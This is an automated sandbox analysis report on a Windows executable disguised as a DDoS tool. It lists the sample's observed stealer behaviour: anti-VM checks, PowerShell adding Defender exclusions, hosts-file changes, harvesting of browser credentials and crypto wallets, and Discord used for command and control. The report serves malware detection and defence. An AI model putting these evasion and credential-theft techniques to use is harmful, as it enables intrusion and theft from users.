6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
05-01-2025 03:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DDOSER FOR WINDOWS 11_protected.exe
Size

8.7MB
MD5

41b147fd16a94a8ea6164177cf91733c
SHA1

f586388782d636b286ef606de997087f451fe11f
SHA256

6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31
SHA512

c15b8cc463186471a12431131d90733f9389d2eded969ee056b1bfe391ab255fc88c4f1b896e05dc6d4f94cba82bf066316fca489047781e13ddfd522e9e5da0
SSDEEP

196608:lPWgT2X83i4bCFRu3TN9hoy6Enwc4GgpG0REtHIrq7L3mrbW3jmy+:lDKXe0c3jWyotGgpGLtz7bmrbmyJ

Score

9^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer themida trojan upx

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	DDOSER FOR WINDOWS 11_protected.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	DDOSER FOR WINDOWS 11_protected.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4500	powershell.exe
1184	powershell.exe
5032	powershell.exe
3540	powershell.exe
3800	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	DDOSER FOR WINDOWS 11_protected.exe

ACProtect 1.3x - 1.4x DLL software 16 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x000a000000023b82-27.dat	acprotect
behavioral2/files/0x0031000000023b75-34.dat	acprotect
behavioral2/files/0x000a000000023b80-35.dat	acprotect
behavioral2/files/0x000a000000023b7c-52.dat	acprotect
behavioral2/files/0x000a000000023b7b-51.dat	acprotect
behavioral2/files/0x000a000000023b7a-50.dat	acprotect
behavioral2/files/0x000a000000023b79-49.dat	acprotect
behavioral2/files/0x000a000000023b78-48.dat	acprotect
behavioral2/files/0x0031000000023b77-47.dat	acprotect
behavioral2/files/0x0031000000023b76-46.dat	acprotect
behavioral2/files/0x000a000000023b74-45.dat	acprotect
behavioral2/files/0x000a000000023b87-44.dat	acprotect
behavioral2/files/0x000a000000023b86-43.dat	acprotect
behavioral2/files/0x000a000000023b85-42.dat	acprotect
behavioral2/files/0x000a000000023b81-39.dat	acprotect
behavioral2/files/0x000a000000023b7f-38.dat	acprotect

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	DDOSER FOR WINDOWS 11_protected.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	DDOSER FOR WINDOWS 11_protected.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	DDOSER FOR WINDOWS 11_protected.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	DDOSER FOR WINDOWS 11_protected.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1512	cmd.exe
4344	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1084	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3932	DDOSER FOR WINDOWS 11_protected.exe
3932	DDOSER FOR WINDOWS 11_protected.exe
3932	DDOSER FOR WINDOWS 11_protected.exe
3932	DDOSER FOR WINDOWS 11_protected.exe
3932	DDOSER FOR WINDOWS 11_protected.exe
3932	DDOSER FOR WINDOWS 11_protected.exe
3932	DDOSER FOR WINDOWS 11_protected.exe
3932	DDOSER FOR WINDOWS 11_protected.exe
3932	DDOSER FOR WINDOWS 11_protected.exe
3932	DDOSER FOR WINDOWS 11_protected.exe
3932	DDOSER FOR WINDOWS 11_protected.exe
3932	DDOSER FOR WINDOWS 11_protected.exe
3932	DDOSER FOR WINDOWS 11_protected.exe
3932	DDOSER FOR WINDOWS 11_protected.exe
3932	DDOSER FOR WINDOWS 11_protected.exe
3932	DDOSER FOR WINDOWS 11_protected.exe
3932	DDOSER FOR WINDOWS 11_protected.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 13 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/memory/4508-0-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/4508-2-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/4508-3-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/3932-25-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/3932-26-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/4508-63-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/3932-76-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/4508-244-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/4508-391-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/4508-408-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/4508-425-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/3932-470-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/4508-475-0x0000000000400000-0x0000000000B47000-memory.dmp	themida

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	DDOSER FOR WINDOWS 11_protected.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	DDOSER FOR WINDOWS 11_protected.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
26	discord.com
27	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com
24	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2168	tasklist.exe
3192	tasklist.exe
544	tasklist.exe
4628	tasklist.exe
816	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3704	cmd.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4508	DDOSER FOR WINDOWS 11_protected.exe
3932	DDOSER FOR WINDOWS 11_protected.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023b82-27.dat	upx
behavioral2/memory/3932-31-0x0000000074E60000-0x000000007536B000-memory.dmp	upx
behavioral2/files/0x0031000000023b75-34.dat	upx
behavioral2/files/0x000a000000023b80-35.dat	upx
behavioral2/memory/3932-54-0x0000000074E00000-0x0000000074E0D000-memory.dmp	upx
behavioral2/memory/3932-53-0x0000000074E10000-0x0000000074E2F000-memory.dmp	upx
behavioral2/files/0x000a000000023b7c-52.dat	upx
behavioral2/files/0x000a000000023b7b-51.dat	upx
behavioral2/files/0x000a000000023b7a-50.dat	upx
behavioral2/files/0x000a000000023b79-49.dat	upx
behavioral2/files/0x000a000000023b78-48.dat	upx
behavioral2/files/0x0031000000023b77-47.dat	upx
behavioral2/files/0x0031000000023b76-46.dat	upx
behavioral2/files/0x000a000000023b74-45.dat	upx
behavioral2/files/0x000a000000023b87-44.dat	upx
behavioral2/files/0x000a000000023b86-43.dat	upx
behavioral2/files/0x000a000000023b85-42.dat	upx
behavioral2/files/0x000a000000023b81-39.dat	upx
behavioral2/files/0x000a000000023b7f-38.dat	upx
behavioral2/memory/3932-60-0x0000000074DD0000-0x0000000074DF7000-memory.dmp	upx
behavioral2/memory/3932-67-0x0000000074C50000-0x0000000074D87000-memory.dmp	upx
behavioral2/memory/3932-66-0x0000000074D90000-0x0000000074DAB000-memory.dmp	upx
behavioral2/memory/3932-65-0x0000000074DB0000-0x0000000074DC8000-memory.dmp	upx
behavioral2/memory/3932-69-0x0000000074C30000-0x0000000074C46000-memory.dmp	upx
behavioral2/memory/3932-71-0x0000000074BE0000-0x0000000074BEC000-memory.dmp	upx
behavioral2/memory/3932-80-0x0000000074B10000-0x0000000074BA4000-memory.dmp	upx
behavioral2/memory/3932-78-0x00000000748B0000-0x0000000074B0A000-memory.dmp	upx
behavioral2/memory/3932-77-0x0000000074BB0000-0x0000000074BD8000-memory.dmp	upx
behavioral2/memory/3932-86-0x0000000074E10000-0x0000000074E2F000-memory.dmp	upx
behavioral2/memory/3932-85-0x0000000074830000-0x000000007483C000-memory.dmp	upx
behavioral2/memory/3932-84-0x0000000074840000-0x0000000074850000-memory.dmp	upx
behavioral2/memory/3932-83-0x0000000074E60000-0x000000007536B000-memory.dmp	upx
behavioral2/memory/3932-88-0x0000000074700000-0x0000000074819000-memory.dmp	upx
behavioral2/memory/3932-155-0x0000000074C50000-0x0000000074D87000-memory.dmp	upx
behavioral2/memory/3932-154-0x0000000074D90000-0x0000000074DAB000-memory.dmp	upx
behavioral2/memory/3932-208-0x0000000074C30000-0x0000000074C46000-memory.dmp	upx
behavioral2/memory/3932-246-0x00000000748B0000-0x0000000074B0A000-memory.dmp	upx
behavioral2/memory/3932-245-0x0000000074BB0000-0x0000000074BD8000-memory.dmp	upx
behavioral2/memory/3932-276-0x0000000074E60000-0x000000007536B000-memory.dmp	upx
behavioral2/memory/3932-291-0x0000000074B10000-0x0000000074BA4000-memory.dmp	upx
behavioral2/memory/3932-290-0x0000000074700000-0x0000000074819000-memory.dmp	upx
behavioral2/memory/3932-277-0x0000000074E10000-0x0000000074E2F000-memory.dmp	upx
behavioral2/memory/3932-393-0x0000000074E60000-0x000000007536B000-memory.dmp	upx
behavioral2/memory/3932-399-0x0000000074C50000-0x0000000074D87000-memory.dmp	upx
behavioral2/memory/3932-394-0x0000000074E10000-0x0000000074E2F000-memory.dmp	upx
behavioral2/memory/3932-464-0x0000000074C50000-0x0000000074D87000-memory.dmp	upx
behavioral2/memory/3932-469-0x00000000748B0000-0x0000000074B0A000-memory.dmp	upx
behavioral2/memory/3932-473-0x0000000074700000-0x0000000074819000-memory.dmp	upx
behavioral2/memory/3932-472-0x0000000074E60000-0x000000007536B000-memory.dmp	upx
behavioral2/memory/3932-471-0x0000000074840000-0x0000000074850000-memory.dmp	upx
behavioral2/memory/3932-468-0x0000000074BB0000-0x0000000074BD8000-memory.dmp	upx
behavioral2/memory/3932-467-0x0000000074BE0000-0x0000000074BEC000-memory.dmp	upx
behavioral2/memory/3932-466-0x0000000074C30000-0x0000000074C46000-memory.dmp	upx
behavioral2/memory/3932-465-0x0000000074DB0000-0x0000000074DC8000-memory.dmp	upx
behavioral2/memory/3932-463-0x0000000074DD0000-0x0000000074DF7000-memory.dmp	upx
behavioral2/memory/3932-462-0x0000000074D90000-0x0000000074DAB000-memory.dmp	upx
behavioral2/memory/3932-461-0x0000000074E10000-0x0000000074E2F000-memory.dmp	upx
behavioral2/memory/3932-460-0x0000000074830000-0x000000007483C000-memory.dmp	upx
behavioral2/memory/3932-459-0x0000000074B10000-0x0000000074BA4000-memory.dmp	upx
behavioral2/memory/3932-458-0x0000000074E00000-0x0000000074E0D000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	systeminfo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DDOSER FOR WINDOWS 11_protected.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DDOSER FOR WINDOWS 11_protected.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4952	cmd.exe
5036	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3448	cmd.exe
4464	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4340	WMIC.exe
1188	WMIC.exe
4072	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2108	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5036	PING.EXE

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
4508	DDOSER FOR WINDOWS 11_protected.exe
4508	DDOSER FOR WINDOWS 11_protected.exe
3932	DDOSER FOR WINDOWS 11_protected.exe
3932	DDOSER FOR WINDOWS 11_protected.exe
4500	powershell.exe
5032	powershell.exe
4500	powershell.exe
5032	powershell.exe
1184	powershell.exe
1184	powershell.exe
1184	powershell.exe
4344	powershell.exe
4344	powershell.exe
4400	powershell.exe
4400	powershell.exe
4344	powershell.exe
4400	powershell.exe
3540	powershell.exe
3540	powershell.exe
3816	powershell.exe
3816	powershell.exe
3800	powershell.exe
3800	powershell.exe
2652	powershell.exe
2652	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2740	WMIC.exe
Token: SeSecurityPrivilege	2740	WMIC.exe
Token: SeTakeOwnershipPrivilege	2740	WMIC.exe
Token: SeLoadDriverPrivilege	2740	WMIC.exe
Token: SeSystemProfilePrivilege	2740	WMIC.exe
Token: SeSystemtimePrivilege	2740	WMIC.exe
Token: SeProfSingleProcessPrivilege	2740	WMIC.exe
Token: SeIncBasePriorityPrivilege	2740	WMIC.exe
Token: SeCreatePagefilePrivilege	2740	WMIC.exe
Token: SeBackupPrivilege	2740	WMIC.exe
Token: SeRestorePrivilege	2740	WMIC.exe
Token: SeShutdownPrivilege	2740	WMIC.exe
Token: SeDebugPrivilege	2740	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2740	WMIC.exe
Token: SeRemoteShutdownPrivilege	2740	WMIC.exe
Token: SeUndockPrivilege	2740	WMIC.exe
Token: SeManageVolumePrivilege	2740	WMIC.exe
Token: 33	2740	WMIC.exe
Token: 34	2740	WMIC.exe
Token: 35	2740	WMIC.exe
Token: 36	2740	WMIC.exe
Token: SeDebugPrivilege	3192	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2740	WMIC.exe
Token: SeSecurityPrivilege	2740	WMIC.exe
Token: SeTakeOwnershipPrivilege	2740	WMIC.exe
Token: SeLoadDriverPrivilege	2740	WMIC.exe
Token: SeSystemProfilePrivilege	2740	WMIC.exe
Token: SeSystemtimePrivilege	2740	WMIC.exe
Token: SeProfSingleProcessPrivilege	2740	WMIC.exe
Token: SeIncBasePriorityPrivilege	2740	WMIC.exe
Token: SeCreatePagefilePrivilege	2740	WMIC.exe
Token: SeBackupPrivilege	2740	WMIC.exe
Token: SeRestorePrivilege	2740	WMIC.exe
Token: SeShutdownPrivilege	2740	WMIC.exe
Token: SeDebugPrivilege	2740	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2740	WMIC.exe
Token: SeRemoteShutdownPrivilege	2740	WMIC.exe
Token: SeUndockPrivilege	2740	WMIC.exe
Token: SeManageVolumePrivilege	2740	WMIC.exe
Token: 33	2740	WMIC.exe
Token: 34	2740	WMIC.exe
Token: 35	2740	WMIC.exe
Token: 36	2740	WMIC.exe
Token: SeDebugPrivilege	4500	powershell.exe
Token: SeDebugPrivilege	5032	powershell.exe
Token: SeIncreaseQuotaPrivilege	4340	WMIC.exe
Token: SeSecurityPrivilege	4340	WMIC.exe
Token: SeTakeOwnershipPrivilege	4340	WMIC.exe
Token: SeLoadDriverPrivilege	4340	WMIC.exe
Token: SeSystemProfilePrivilege	4340	WMIC.exe
Token: SeSystemtimePrivilege	4340	WMIC.exe
Token: SeProfSingleProcessPrivilege	4340	WMIC.exe
Token: SeIncBasePriorityPrivilege	4340	WMIC.exe
Token: SeCreatePagefilePrivilege	4340	WMIC.exe
Token: SeBackupPrivilege	4340	WMIC.exe
Token: SeRestorePrivilege	4340	WMIC.exe
Token: SeShutdownPrivilege	4340	WMIC.exe
Token: SeDebugPrivilege	4340	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4340	WMIC.exe
Token: SeRemoteShutdownPrivilege	4340	WMIC.exe
Token: SeUndockPrivilege	4340	WMIC.exe
Token: SeManageVolumePrivilege	4340	WMIC.exe
Token: 33	4340	WMIC.exe
Token: 34	4340	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4508 wrote to memory of 3932	4508	DDOSER FOR WINDOWS 11_protected.exe	83
PID 4508 wrote to memory of 3932	4508	DDOSER FOR WINDOWS 11_protected.exe	83
PID 4508 wrote to memory of 3932	4508	DDOSER FOR WINDOWS 11_protected.exe	83
PID 3932 wrote to memory of 4180	3932	DDOSER FOR WINDOWS 11_protected.exe	84
PID 3932 wrote to memory of 4180	3932	DDOSER FOR WINDOWS 11_protected.exe	84
PID 3932 wrote to memory of 4180	3932	DDOSER FOR WINDOWS 11_protected.exe	84
PID 3932 wrote to memory of 2960	3932	DDOSER FOR WINDOWS 11_protected.exe	85
PID 3932 wrote to memory of 2960	3932	DDOSER FOR WINDOWS 11_protected.exe	85
PID 3932 wrote to memory of 2960	3932	DDOSER FOR WINDOWS 11_protected.exe	85
PID 3932 wrote to memory of 4260	3932	DDOSER FOR WINDOWS 11_protected.exe	86
PID 3932 wrote to memory of 4260	3932	DDOSER FOR WINDOWS 11_protected.exe	86
PID 3932 wrote to memory of 4260	3932	DDOSER FOR WINDOWS 11_protected.exe	86
PID 3932 wrote to memory of 1096	3932	DDOSER FOR WINDOWS 11_protected.exe	87
PID 3932 wrote to memory of 1096	3932	DDOSER FOR WINDOWS 11_protected.exe	87
PID 3932 wrote to memory of 1096	3932	DDOSER FOR WINDOWS 11_protected.exe	87
PID 3932 wrote to memory of 2692	3932	DDOSER FOR WINDOWS 11_protected.exe	92
PID 3932 wrote to memory of 2692	3932	DDOSER FOR WINDOWS 11_protected.exe	92
PID 3932 wrote to memory of 2692	3932	DDOSER FOR WINDOWS 11_protected.exe	92
PID 4180 wrote to memory of 4500	4180	cmd.exe	94
PID 4180 wrote to memory of 4500	4180	cmd.exe	94
PID 4180 wrote to memory of 4500	4180	cmd.exe	94
PID 2960 wrote to memory of 5032	2960	cmd.exe	95
PID 2960 wrote to memory of 5032	2960	cmd.exe	95
PID 2960 wrote to memory of 5032	2960	cmd.exe	95
PID 1096 wrote to memory of 3192	1096	cmd.exe	96
PID 1096 wrote to memory of 3192	1096	cmd.exe	96
PID 1096 wrote to memory of 3192	1096	cmd.exe	96
PID 2692 wrote to memory of 2740	2692	cmd.exe	97
PID 2692 wrote to memory of 2740	2692	cmd.exe	97
PID 2692 wrote to memory of 2740	2692	cmd.exe	97
PID 4260 wrote to memory of 2980	4260	cmd.exe	98
PID 4260 wrote to memory of 2980	4260	cmd.exe	98
PID 4260 wrote to memory of 2980	4260	cmd.exe	98
PID 3932 wrote to memory of 4448	3932	DDOSER FOR WINDOWS 11_protected.exe	154
PID 3932 wrote to memory of 4448	3932	DDOSER FOR WINDOWS 11_protected.exe	154
PID 3932 wrote to memory of 4448	3932	DDOSER FOR WINDOWS 11_protected.exe	154
PID 4448 wrote to memory of 4016	4448	cmd.exe	102
PID 4448 wrote to memory of 4016	4448	cmd.exe	102
PID 4448 wrote to memory of 4016	4448	cmd.exe	102
PID 3932 wrote to memory of 3608	3932	DDOSER FOR WINDOWS 11_protected.exe	152
PID 3932 wrote to memory of 3608	3932	DDOSER FOR WINDOWS 11_protected.exe	152
PID 3932 wrote to memory of 3608	3932	DDOSER FOR WINDOWS 11_protected.exe	152
PID 3608 wrote to memory of 2964	3608	cmd.exe	105
PID 3608 wrote to memory of 2964	3608	cmd.exe	105
PID 3608 wrote to memory of 2964	3608	cmd.exe	105
PID 3932 wrote to memory of 2368	3932	DDOSER FOR WINDOWS 11_protected.exe	106
PID 3932 wrote to memory of 2368	3932	DDOSER FOR WINDOWS 11_protected.exe	106
PID 3932 wrote to memory of 2368	3932	DDOSER FOR WINDOWS 11_protected.exe	106
PID 2368 wrote to memory of 4340	2368	cmd.exe	108
PID 2368 wrote to memory of 4340	2368	cmd.exe	108
PID 2368 wrote to memory of 4340	2368	cmd.exe	108
PID 3932 wrote to memory of 1844	3932	DDOSER FOR WINDOWS 11_protected.exe	109
PID 3932 wrote to memory of 1844	3932	DDOSER FOR WINDOWS 11_protected.exe	109
PID 3932 wrote to memory of 1844	3932	DDOSER FOR WINDOWS 11_protected.exe	109
PID 1844 wrote to memory of 1188	1844	cmd.exe	111
PID 1844 wrote to memory of 1188	1844	cmd.exe	111
PID 1844 wrote to memory of 1188	1844	cmd.exe	111
PID 3932 wrote to memory of 3704	3932	DDOSER FOR WINDOWS 11_protected.exe	112
PID 3932 wrote to memory of 3704	3932	DDOSER FOR WINDOWS 11_protected.exe	112
PID 3932 wrote to memory of 3704	3932	DDOSER FOR WINDOWS 11_protected.exe	112
PID 3932 wrote to memory of 700	3932	DDOSER FOR WINDOWS 11_protected.exe	113
PID 3932 wrote to memory of 700	3932	DDOSER FOR WINDOWS 11_protected.exe	113
PID 3932 wrote to memory of 700	3932	DDOSER FOR WINDOWS 11_protected.exe	113
